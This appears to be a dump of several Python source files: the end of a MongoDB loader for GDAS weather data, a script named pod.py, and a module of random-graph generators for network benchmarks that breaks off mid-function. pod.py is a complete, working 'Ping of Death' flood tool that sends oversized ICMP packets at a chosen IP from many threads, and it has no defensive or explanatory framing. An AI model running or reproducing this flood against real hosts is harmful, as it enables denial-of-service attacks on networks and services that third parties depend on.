dict = mongoDBI.mongoDBI.get_insert_dict (key_label, key_contents, value_label, value_contents)
self.insert_to_buffer (table, dict)
self.write_buffer ()
return;
def flush(self):
self.dbi.insert_bulk (self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[ t ] = [ ]
return
# ------------------------ END OF CLASS ------------------------#
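# Illustrative sketch (not part of the original script): how the buffer class above is
# used. It assumes the constants module defines mongo_db_tables, label_date, label_value
# and db_name_date_complete as referenced earlier; the date and payload are hypothetical.
def _example_buffer_usage():
    buffer_obj = buffer(constants.db_name_date_complete)
    # One data_map per record: the label key identifies the record, the remaining
    # keys are table names whose values are written to those tables.
    data_map = {constants.label_date: '2016-01-01'}
    for table in constants.mongo_db_tables:
        data_map[table] = {'example_field': 0.0}  # hypothetical payload
    buffer_obj.insert_to_db(data_map, label=constants.label_date)
    buffer_obj.flush()  # force any buffered rows out to MongoDB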
#
# Load complete data for each date into db
# Process complete data (4 per day) of each date, of the given year
#
def process_year_by_date_complete(year):
cur_day = utils.get_current_day ()
cur_year = utils.get_current_year ()
buffer_obj = buffer (constants.db_name_date_complete)
dir = str (year)
if not os.path.exists (dir):
return
os.chdir (dir)
start_day = constants.gdas_min_day
if year == cur_year:
end_day = cur_day
else:
end_day = constants.gdas_max_day
# Process the files for a single day
for day in range (start_day, end_day + 1):
dir = str (day).zfill (3)
if not os.path.exists (dir):
continue
try:
os.chdir (dir)
files = glob.glob ("gdas*z") # get list of data
data = parse_grb_files.parse_files_by_date_complete (files)
for data_element in data:
buffer_obj.insert_to_db (data_element, label=constants.label_date_idx)
os.chdir ("../")
except:
pass
os.chdir ("../")
os.chdir ("../")
buffer_obj.flush ()
# -------------------------------------------- #
def load_by_date_complete():
print ('Current Working directory ', os.getcwd())
cur_year = utils.get_current_year ()
os.chdir (constants.data_dir)
os.chdir (constants.gdas_data_dir)
years = range (constants.gdas_start_year, cur_year + 1)
process_pool = []
for year in years:
p = Process (target=process_year_by_date_complete, args=(year,))
process_pool.append (p)
for p in process_pool:
p.start ()
for p in process_pool:
p.join ()
return
load_by_date_complete()
|
pod.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, ICMP, send
from threading import Thread
# Import modules for POD flood
import tools.randomData as randomData
def POD_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting POD attack...")
threads_list = []
# POD flood
def pod_flood():
global FINISH
payload = random.choice(list("1234567890qwertyuiopasdfghjklzxcvbnm")) * 60000
packet = IP(dst = target_ip) / ICMP(id = 65535, seq = 65535) / payload
while not FINISH:
for i in range(16):
send(packet, verbose = False)
print("\033[1;32m"+"[+]"+"\033[0m"+" Packet was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = pod_flood)
t.start()
threads_list.append(t)
# Sleep for the selected attack duration (seconds)
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" POD attack completed.")
|
graph_gens.py
|
#!/usr/local/bin/python
# coding: utf-8
import os
import sys
from time import time
from subprocess import call
import numpy as np
from sklearn.preprocessing import OneHotEncoder
import networkx as nx
import scipy
from scipy import special
from numpy import pi
import itertools
from gemben.utils import graph_util,kronecker_generator,kronecker_init_matrix
import math
import multiprocessing
def truncate(f, n):
"""Function to truncate the given floating point values."""
return math.floor(f * 10 ** n) / 10 ** n
def plot_hist(title, data):
"""Function to truncate the given floating point values."""
import matplotlib.pyplot as plt
plt.figure()
plt.title(title)
plt.hist(x=data)
plt.savefig(title + '.png')
##########################################################################
def barbell_graph(m1,m2):
"""Function to generate barbell graph.
A n-barbell graph is the simple graph obtained by connecting
two copies of a complete graph K_n by a bridge.
Return the Barbell Graph: two complete graphs connected by a path.
For m1 > 1 and m2 >= 0.
Two identical complete graphs K_{m1} form the left and right bells,
and are connected by a path P_{m2}.
The 2*m1+m2 nodes are numbered
0,...,m1-1 for the left barbell,
m1,...,m1+m2-1 for the path,
and m1+m2,...,2*m1+m2-1 for the right barbell.
"""
graph = nx.barbell_graph(m1,m2)
## for com_nc, one hot
#onehot_com = np.array([[1,0,0]]*m1+[[0,1,0]]*m2+[[0,0,1]]*m1) is slower when num of nodes > 2000
node_labels_com = np.zeros(m1*2+m2).astype(int)
node_labels_com[m1:m1+m2] = 2
node_labels_com[m1+m2:] = 1
## one hot
onehot_com = np.zeros((m1*2+m2,3)).astype(int)
onehot_com[np.arange(m1*2+m2), node_labels_com] = 1
## for role_nc, one hot
node_labels_role = np.zeros(m1*2+m2).astype(int)
p,q = divmod(m2, 2)
for i in range(p+1):
node_labels_role[[m1-1+i,m1+m2-i]] = i+1
if q:
node_labels_role[m1+p] = p+2
onehot_role = np.zeros((m1*2+m2,p+q+2)).astype(int)
onehot_role[np.arange(m1*2+m2), node_labels_role] = 1
return graph, scipy.sparse.csr_matrix(onehot_com), scipy.sparse.csr_matrix(onehot_role)
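# Illustrative sketch (not part of the original module): building a small barbell graph
# and checking the shapes of the community / role label matrices returned above.
def _example_barbell_usage(m1=5, m2=3):
    graph, onehot_com, onehot_role = barbell_graph(m1, m2)
    # 2*m1 + m2 nodes in total; community labels are one-hot over 3 classes
    assert onehot_com.shape == (2 * m1 + m2, 3)
    assert onehot_role.shape[0] == 2 * m1 + m2
    return graph.number_of_nodes(), graph.number_of_edges()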
##########################################################################
def binary_community_graph(N, k, maxk, mu):
"""Retruns a binary community graph. """
if sys.platform[0] == "w":
args = ["gemben/c_exe/benchm.exe"]
fcall = "gemben/c_exe/benchm.exe"
else:
args = ["gemben/c_exe/benchm"]
fcall = "gemben/c_exe/benchm"
args.append("-N %d" % N)
args.append("-k %d" % k)
args.append("-maxk %d" % maxk)
args.append("-mu %f" % mu)
t1 = time()
print(args)
try:
os.system("%s -N %d -k %d -maxk %d -mu %f" % (fcall, N, k, maxk, mu))
# call(args)
except Exception as e:
print('ERROR: %s' % str(e))
print('gemben/c_exe/benchm not found. Please compile gf, place benchm in the path and grant executable permission')
t2 = time()
print('\tTime taken to generate random graph: %f sec' % (t2 - t1))
try:
graph = graph_util.loadGraphFromEdgeListTxt('gemben/c_exe/network.dat')
node_labels = np.loadtxt('gemben/c_exe/community.dat')
except:
graph = graph_util.loadGraphFromEdgeListTxt('network.dat')
node_labels = np.loadtxt('community.dat')
node_labels = node_labels[:, -1].reshape(-1, 1)
enc = OneHotEncoder()
return graph, enc.fit_transform(node_labels)
########################################################################
def barabasi_albert_graph(N, deg, dia,dim, domain):
''' Return random graph using Barabási-Albert preferential attachment model.
Args:
n (int): Number of Nodes
deg (int): Degree of the graphs
dia (float): diameter of the graph
dim (int):
m: Number of edges to attach from a new node to existing nodes
Formula for m: (m^2)- (Nm)/2 + avg_deg * (N/2) = 0 => From this equation we need to find m :
:return: Graph Object
Returns:
Object: Best graph, best average degree and best diameter.
'''
## Calculate m (edges attached per new node) from the requested average degree; see the formula in the docstring.
## The Barabasi-Albert model gives no direct control over the diameter, so a target diameter is not supported.
if dia > 0:
return None
strt_time = time()
m = int(round((N - np.sqrt(N**2 - 4*deg*N))/4))
G = nx.barabasi_albert_graph(n=N, m=m)
lcc, _ = graph_util.get_lcc_undirected(G)
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = np.mean(list(dict(nx.degree(best_G)).values()))
end_time = time()
print('Graph_Name: Barabasi Albert Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ' , end_time - strt_time, ' secs')
return best_G, best_avg_deg, best_diam
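# Illustrative sanity check (not part of the original module) for the formula used above
# to derive m from the requested average degree: for N=1024 and deg=8 it yields m=4, and
# a BA graph with m=4 has an average degree close to 2*m = 8.
def _example_barabasi_albert_m(N=1024, deg=8):
    m = int(round((N - np.sqrt(N ** 2 - 4 * deg * N)) / 4))
    G = nx.barabasi_albert_graph(n=N, m=m)
    avg_deg = np.mean(list(dict(nx.degree(G)).values()))
    return m, avg_deg  # expected: (4, roughly 8)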
########################################################################################################################
def random_geometric_graph(N, deg, dia, dim, domain):
''' Return the random geometric graph in the unit cube.
The random geometric graph model places n nodes uniformly at random
in the unit cube. Two nodes `u,v` are connected with an edge if
`d(u,v)<=r` where `d` is the Euclidean distance and `r` is a radius
threshold.
Average Degree is given by formula: Avg_Deg = (pi*(r^2)*num_nodes)/(l^2)
Formula for r: r = sqrt((avg_deg * l) / (pi * N)),
where the constant l ~= 1.04 approximates the squared side length of the
square domain (empirically found).
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
strt_time = time()
l = 1.04
count = 0
tolerance = 0.5
curr_deg_error = float('inf')
while tolerance < curr_deg_error:
r = np.round(np.sqrt((deg * l ) / (3.14 * N)), 3)
G = nx.random_geometric_graph(n=N, radius=r)
curr_avg_deg = np.mean(list(dict(nx.degree(G)).values()))
lcc = graph_util.get_lcc_undirected(G)[0]
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = curr_avg_deg
end_time = time()
print('Graph_Name: Random_Geometric_Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
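# Illustrative sanity check (not part of the original module) for the radius formula used
# above: for N=1024 nodes and a target average degree of 8, the initial radius works out
# to about 0.051.
def _example_geometric_radius(N=1024, deg=8, l=1.04):
    r = np.round(np.sqrt((deg * l) / (3.14 * N)), 3)
    return r  # approximately 0.051 for the defaults above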
########################################################################################################################
def waxman_graph(N, deg, dia, dim, domain):
'''Return a Waxman random graph.
The Waxman random graph models place n nodes uniformly at random
in a rectangular domain. Two nodes u,v are connected with an edge
with probability
Parameters of the graph:
n (int or iterable) – Number of nodes or iterable of nodes
beta (float) – Model parameter
alpha (float) – Model parameter
Average Degree is given by formula: k
where P = beta * exp(-d/alpha*L)
alpha = (gamma((k/2)+1) * (beta^k))/((n-1)*(pi^(k/2))*gamma(k))
where beta is chosen randomly to satisfy the average degree criterion
So we fix the parameter beta = 0.1, and we know the default value of d/L is in the range 0.25 to 0.3 (empirically calculated),
so we only tweak alpha to get the required avg deg.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
strt_time = time()
bands = 10
lower_lim = 2.5
upper_lim = 3.5
tolerance = 0.5
k = 2
curr_avg_deg_error = float('inf')
flag = False
while curr_avg_deg_error >= tolerance:
s_space = np.linspace(lower_lim, upper_lim, bands)
avg_deg_error_list = []
s_gap = s_space[1] - s_space[0]
for s in s_space:
g_s = (k * (pi ** (k / 2)) * special.gamma(k)) / (special.gamma((k / 2) + 1) * (s ** k))
q = deg/((N-1)*g_s)
G = nx.waxman_graph(n=N, alpha=s, beta=q)
lcc = graph_util.get_lcc_undirected(G)[0]
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
avg_deg_err = abs(curr_avg_deg - deg)
if avg_deg_err <= tolerance:
best_G = G
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
flag = True
break
avg_deg_error_list.append((lcc,avg_deg_err , curr_avg_deg, s))
if flag == True:
break
sorted_avg_err = sorted(avg_deg_error_list, key=lambda x: x[1])
curr_avg_deg_error = sorted_avg_err[0][1]
if sorted_avg_err[0][1] <= tolerance:
best_G = sorted_avg_err[0][0]
best_avg_deg = sorted_avg_err[0][2]
best_diam = nx.algorithms.diameter(best_G)
break
else:
lower_lim = sorted_avg_err[0][3] - s_gap
upper_lim = sorted_avg_err[0][3] + s_gap
end_time = time()
print('Graph_Name: waxman_graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################
def watts_strogatz_graph(N, deg, dia, dim, domain):
'''Return a Watts-Strogatz small-world graph.
First create a ring over n nodes. Then each node in the ring is
connected with its k nearest neighbors (k-1 neighbors if k is odd).
Then shortcuts are created by replacing some edges as follows:
for each edge u-v in the underlying "n-ring with k nearest neighbors"
with probability p replace it with a new edge u-w with uniformly
random choice of existing node w.
Parameters of the graph:
n (int) – The number of nodes
k (int) – Each node is joined with its k nearest neighbors in a ring topology.
p (float) – The probability of rewiring each edge
Average Degree is solely decided by k
Diameter depends on the value of p
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
strt_time = time()
p = 0.2
G = nx.watts_strogatz_graph(n=N, k=deg, p=p)
lcc, _ = graph_util.get_nk_lcc_undirected(G)
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = np.mean(list(dict(nx.degree(best_G)).values()))
end_time = time()
print('Graph_Name: Watts_Strogatz_Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
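# Illustrative sketch (not part of the original module): in the Watts-Strogatz model the
# ring parameter k directly fixes the average degree, so no parameter search is needed;
# the rewiring probability p mainly affects path lengths and hence the diameter.
def _example_watts_strogatz(N=1024, deg=8, p=0.2):
    G = nx.watts_strogatz_graph(n=N, k=deg, p=p)
    avg_deg = np.mean(list(dict(nx.degree(G)).values()))
    return avg_deg  # equals deg exactly when deg is even (here: 8.0)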
########################################################################
def duplication_divergence_graph(N, deg, dia, dim, domain):
'''Returns an undirected graph using the duplication-divergence model.
A graph of ``n`` nodes is created by duplicating the initial nodes
and retaining edges incident to the original nodes with a retention
probability ``p``.
Parameters of the graph:
n (int) – The desired number of nodes in the graph.
p (float) – The probability for retaining the edge of the replicated node.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
strt_time = time()
tolerance = 0.5
if deg == 4:
lower_lim = 0.3
upper_lim = 0.4
bands = 10
elif deg == 6:
lower_lim = 0.4
upper_lim = 0.6
bands = 15
elif deg == 8:
lower_lim = 0.46
upper_lim = 0.60
bands = 15
elif deg == 10:
lower_lim = 0.50
upper_lim = 0.65
bands = 15
elif deg == 12:
lower_lim = 0.55
upper_lim = 0.68
bands = 15
else:
# Fallback search band for average degrees outside the empirically tuned set above
lower_lim = 0.3
upper_lim = 0.7
bands = 20
flag = False
curr_avg_deg_error = float('inf')
while curr_avg_deg_error > tolerance:
p_space = np.linspace(lower_lim, upper_lim, bands)
avg_deg_err_list = []
p_gap = p_space[1] - p_space[0]
for p_val in p_space:
G = nx.duplication_divergence_graph(n=N, p=p_val)
lcc, _ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
curr_avg_deg_error = abs(deg - curr_avg_deg)
avg_deg_err_list.append((lcc, curr_avg_deg_error, p_val, curr_avg_deg))
if deg - curr_avg_deg < 0:
break
if curr_avg_deg_error <= tolerance:
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(best_G)
flag = True
break
if flag == True:
break
sorted_avg_err = sorted(avg_deg_err_list, key=lambda x: x[1])
curr_avg_deg_error = sorted_avg_err[0][1]
if sorted_avg_err[0][1] <= tolerance:
best_G = sorted_avg_err[0][0]
best_avg_deg = sorted_avg_err[0][3]
best_diam = nx.algorithms.diameter(best_G)
break
else:
lower_lim = sorted_avg_err[0][2] - p_gap
upper_lim = sorted_avg_err[0][2] + p_gap
end_time = time()
print('Graph_Name: duplication divergence graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################
def powerlaw_cluster_graph(N, deg, dia, dim, domain):
'''Holme and Kim algorithm for growing graphs with powerlaw
degree distribution and approximate average clustering.
The average clustering has a hard time getting above a certain
cutoff that depends on ``m``. This cutoff is often quite low. The
transitivity (fraction of triangles to possible triangles) seems to
decrease with network size.
It is essentially the Barabási–Albert (BA) growth model with an
extra step that each random edge is followed by a chance of
making an edge to one of its neighbors too (and thus a triangle).
This algorithm improves on BA in the sense that it enables a
higher average clustering to be attained if desired.
It seems possible to have a disconnected graph with this algorithm
since the initial ``m`` nodes may not be all linked to a new node
on the first iteration like the BA model.
Parameters of the graph:
n (int) – the number of nodes
m (int) – the number of random edges to add for each new node
p (float,) – Probability of adding a triangle after adding a random edge
Formula for m: (m^2)- (Nm)/2 + avg_deg * (N/2) = 0 => From this equation we need to find m :
p : Does not vary the average degree or diameter so much. : Higher value of p may cause average degree to overshoot intended average_deg
so we give the control of average degree to parameter m: by setting a lower value of p: 0.1
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
## Calculate m (random edges added per new node) from the requested average degree; see the formula in the docstring.
strt_time = time()
m = int(round((N - np.sqrt(N ** 2 - 4 * deg * N)) / 4))
p = 0.2
## G at center:
G = nx.powerlaw_cluster_graph(n=N, m=m, p=p)
lcc, _ = graph_util.get_nk_lcc_undirected(G)
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = np.mean(list(dict(nx.degree(best_G)).values()))
end_time = time()
print('Graph_Name: powerlaw_cluster_graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
#####################################################################
def stochastic_block_model(N, deg, dia, dim, domain):
'''Returns a stochastic block model graph.
This model partitions the nodes in blocks of arbitrary sizes, and places
edges between pairs of nodes independently, with a probability that depends
on the blocks.
:param N: Number of Nodes
:param p: Element (r,s) gives the density of edges going from the nodes of group r
to nodes of group s. p must match the number of groups (len(sizes) == len(p)),
and it must be symmetric if the graph is undirected.
Formula for p: Through Empirical Studies - p = 0.001 * Deg gives perfect result for Num_of_Nodes = 1024
But if N >1024: scaler = N/1024 : then p = (0.001*deg)/scaler
And if N < 1024 : Scaler = 1024/N : then p = (0.001*deg)*scaler
and if N == 1024: p = (0.001*deg)
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
tolerance = 0.5
curr_deg_error = float('inf')
count = 0
p_default = 0.001 * deg
N_default = 1024
if N_default > N:
p_scaler = N_default/N
p = p_default * p_scaler
elif N_default < N:
p_scaler = N / N_default
p = p_default / p_scaler
else:
p = p_default
strt_time = time()
while curr_deg_error > tolerance:
G = nx.generators.stochastic_block_model([N],[[p]])
lcc,_ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(G)).values()))
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
end_time = time()
print('Graph_Name: Stochastic Block Model')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
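# Illustrative sanity check (not part of the original module) for the empirical scaling of
# the block probability p described in the docstring above: p = 0.001*deg at N=1024,
# scaled up for smaller graphs and down for larger ones.
def _example_sbm_probability(N, deg):
    p_default = 0.001 * deg
    N_default = 1024
    if N < N_default:
        return p_default * (N_default / N)   # e.g. N=512,  deg=8 -> 0.016
    elif N > N_default:
        return p_default / (N / N_default)   # e.g. N=2048, deg=8 -> 0.004
    return p_default                         # e.g. N=1024, deg=8 -> 0.008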
#####################################################################
def r_mat_graph(N, deg, dia, dim, domain):
"""Generates static R-MAT graphs.
R-MAT (recursive matrix) graphs are random graphs with
n=2^scale nodes and m=n*edgeFactor edges. More details
at http://www.graph500.org or in the original paper: Deepayan Chakrabarti,
Yiping Zhan,
Christos Faloutsos: R-MAT: A Recursive Model for Graph Mining.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
"""
import networkit as nk
tolerance = 0.5
curr_deg_error = float('inf')
count = 0
strt_time = time()
scale = np.log2(N)
while curr_deg_error > tolerance:
G_Nk = nk.generators.RmatGenerator(scale=scale,edgeFactor=deg/2, a=0.25,b=0.25,c=0.25,d=0.25).generate()
G = graph_util.convertNkToNx(G_Nk)
lcc,_ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
if count == 1000:
raise("MAX TRIES EXCEEDED, TRY AGAIN")
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
end_time = time()
print('Graph_Name: RMAT')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
#####################################################################
def hyperbolic_graph(N, deg, dia, dim, domain):
'''The Hyperbolic Generator distributes points in hyperbolic space and adds edges
between points with a probability depending on their distance.
The resulting graphs have a power-law degree distribution, small diameter
and high clustering coefficient. For a temperature of 0, the model resembles
a unit-disk model in hyperbolic space.
Parameters of the graph:
N = Num of nodes
k = Average degree
gamma = Target exponent in Power Law Distribution
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
import networkit as nk
tolerance = 0.5
curr_deg_error = float('inf')
count = 0
strt_time = time()
while curr_deg_error > tolerance:
G_Nk = nk.generators.HyperbolicGenerator(n = N,k = deg,gamma = 3.5).generate()
G = graph_util.convertNkToNx(G_Nk)
lcc,_ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
end_time = time()
print('Graph_Name: Hyperbolic Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################
def stochastic_kronecker_graph(N, deg, dia, dim, domain):
'''Generates stochastic kronecker graph.
The stochastic Kronecker graph model introduced by Leskovec et al.
is a random graph with vertex set Z_2^n, where two vertices u and v are connected
with probability `α^(u·v) · γ^((1−u)·(1−v)) · β^(n−u·v−(1−u)·(1−v))` independently of the
presence or absence of any other edge, for fixed parameters `0 < α, β, γ < 1`.
Empirically the degree sequence resembles a power law distribution, although later
work showed that, asymptotically almost surely, the model does not follow a power
law degree distribution for any parameters `0 < α, β, γ < 1`.
Parameters of the graph:
degree_seq
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
strt_time = time()
nodes = 2
init = kronecker_init_matrix.InitMatrix(nodes)
init.make()
# Alpha Beta Method of Testing
init.addEdge(0, 1)
init.addSelfEdges()
tolerance = 0.5
## Write Custom Params
avg_deg_error = float('inf')
max_tries = 1000
count =0
if domain == "social":
alphas, betas, gammas = [0.999], np.linspace(0.45, 0.8, 10), np.linspace(0.2, 0.4, 10)
elif domain == "biology":
alphas, betas, gammas = [0.85], np.linspace(0.6, 0.95, 10), np.linspace(0.01, 0.15, 10)
elif domain == "internet":
alphas, betas, gammas = np.linspace(0.95, 0.99, 10), np.linspace(0.55, 0.8, 10), np.linspace(0.05, 0.25, 10)
elif domain == "citation":
alphas, betas, gammas = [0.999], np.linspace(0.35, 0.6, 10), np.linspace(0.2, 0.8, 10)
else:
alphas, betas, gammas = np.linspace(0.1, 1.0, 20), np.linspace(0.1, 1.0, 20), np.linspace(0.1, 1.0, 20)
while count < max_tries:
FLAG = False
for alpha, beta, gamma in itertools.product(*[alphas, betas, gammas]):
init.makeStochasticCustom(np.asarray([alpha, beta, beta, gamma]))
k = round(np.log2(N))
best_G = kronecker_generator.generateStochasticKron(init, k)
lcc = graph_util.get_lcc_undirected(best_G)[0]
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
#print(curr_avg_deg)
curr_diam = nx.algorithms.diameter(lcc)
avg_deg_error = abs(curr_avg_deg-deg)
if avg_deg_error < tolerance:
FLAG = True
break
if FLAG:
break
count += 1
end_time = time()
print('Graph_Name: Stochastic Kronecker Graph')
print('Num_Nodes: ', nx.number_of_nodes(lcc), ' Avg_Deg : ', curr_avg_deg, ' Diameter: ', curr_diam)
print('TIME: ', end_time - strt_time)
return lcc, curr_avg_deg, curr_diam
########################################################################################################################
def lfr_benchmark_graph(N, deg, dia, dim, domain):
'''Returns the LFR benchmark graph for testing community-finding
algorithms.
Parameters of the graph:
n (int) – Number of nodes in the created graph.
tau1 (float) – Power law exponent for the degree distribution of the created graph. This value must be strictly greater than one.
tau2 (float) – Power law exponent for the community size distribution in the created graph. This value must be strictly greater than one.
mu (float) – Fraction of intra-community edges incident to each node. This value must be in the interval [0, 1].
average_degree (float) – Desired average degree of nodes in the created graph. This value must be in the interval [0, n]. Exactly one of this and min_degree must be specified, otherwise a NetworkXError is raised.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, best average degree and best diameter.
'''
strt_time = time()
tau1 = [1.5, 2, 2.5, 3]
tau2 = [1.5, 2, 2.5, 3]
mu = [0.1,0.5]
min_community = [20, 40, 60, 80, 100]
import itertools
params = list(itertools.product(*[tau1, tau2, mu, min_community]))
avg_deg_for_plot = []
max_tries = 2000
count = 0
tolerance = 0.5
flag = False
def lfr_call(G, N, tau1, tau2, mu, deg, min_comm):
try:
# print('CALLED')
G['graph'] = nx.community.community_generators.LFR_benchmark_graph(n=N, tau1=tau1, tau2=tau2, mu=mu,
average_degree=deg, min_community=min_comm)
except:
G = None
pass
manager = multiprocessing.Manager()
while count < max_tries:
for tup in params:
try:
G1 = manager.dict()
lfr_process = multiprocessing.Process(target=lfr_call, name="LFR", args=(G1, N, tup[0],tup[1], tup[2], deg, tup[3]))
lfr_process.start()
lfr_process.join(10)
if lfr_process.is_alive():
lfr_process.terminate()
lfr_process.join()
continue
if not G1:
continue
G1 = G1['graph']
lcc = graph_util.get_lcc_undirected(G1)[0]
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
avg_deg_for_plot.append(curr_avg_deg)
# print(deg, ' : CURR_AVG_DEG : ', curr_avg_deg)
curr_deg_error = abs(curr_avg_deg - deg)
if curr_deg_error < tolerance:
best_G = G1
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
flag = True
break
except:
continue
if flag == True:
break
count += 1
# plot_hist('LFR_PLOT_DEG',avg_deg_for_plot)
if count >= max_tries:
raise RuntimeError('MAX_NUM_ITERATIONS Reached. Retry')
end_time = time()
print('Graph_Name: lfr_benchmark_graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
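# Illustrative sketch (not part of the original module) of the timeout pattern used above:
# run a potentially slow generator in a separate process, give it a fixed number of
# seconds, and abandon that parameter combination if it has not finished. The target is
# any callable shaped like the nested lfr_call above (shared dict first, then its args).
def _example_run_with_timeout(target, args, timeout_sec=10):
    """Return the 'graph' entry of the shared dict, or None if the call timed out."""
    manager = multiprocessing.Manager()
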